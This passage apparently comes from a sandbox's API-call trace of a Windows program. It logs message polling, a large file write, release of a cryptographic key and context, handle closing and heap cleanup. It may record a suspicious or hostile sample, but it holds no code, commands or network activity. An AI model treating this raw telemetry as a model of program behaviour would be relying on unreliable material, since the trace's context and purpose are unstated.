lpMsg=0x8cf3b8) returned 0 [0149.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.881] WriteFile (in: hFile=0x4ec, lpBuffer=0x2ac4f58*, nNumberOfBytesToWrite=0x15b40, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ac4f58*, lpNumberOfBytesWritten=0x8cf5e4*=0x15b40, lpOverlapped=0x0) returned 1 [0149.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.884] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0149.884] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.884] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0149.885] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.885] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.885] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.885] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0149.885] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.885] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0149.885] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0149.885] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa510, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0149.885] CryptDestroyKey (hKey=0x9e2078) returned 1 [0149.885] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.885] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.885] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.885] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.885] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.885] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.885] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.885] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.885] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.885] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.885] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.886] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.886] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.886] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.886] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.886] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0149.886] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.886] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0149.886] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0149.886] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.886] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.886] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.886] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.886] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.886] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.886] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.886] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.886] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.886] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.886] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.886] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.886] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.887] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.887] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.887] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.887] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.887] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.887] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.887] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.887] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.887] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.887] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.887] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.887] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.887] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.887] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.887] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.887] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.887] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.887] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0149.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0149.887] CryptReleaseContext (hProv=0x9be9a0, dwFlags=0x0) returned 1 [0149.887] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.887] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.888] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.888] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.888] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.888] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.888] FreeLibrary (hLibModule=0x76390000) returned 1 [0149.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.888] CloseHandle (hObject=0x4fc) returned 1 [0149.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.888] CloseHandle (hObject=0x4ec) returned 1 [0149.895] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0149.895] TranslateMessage (lpMsg=0x8cf708) returned 0 [0149.895] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0149.895] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0149.895] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0149.895] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0149.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0149.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0149.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0149.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0149.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0149.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0149.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0149.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0149.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0149.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0149.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0149.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0149.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0149.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0149.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0149.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0149.900] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 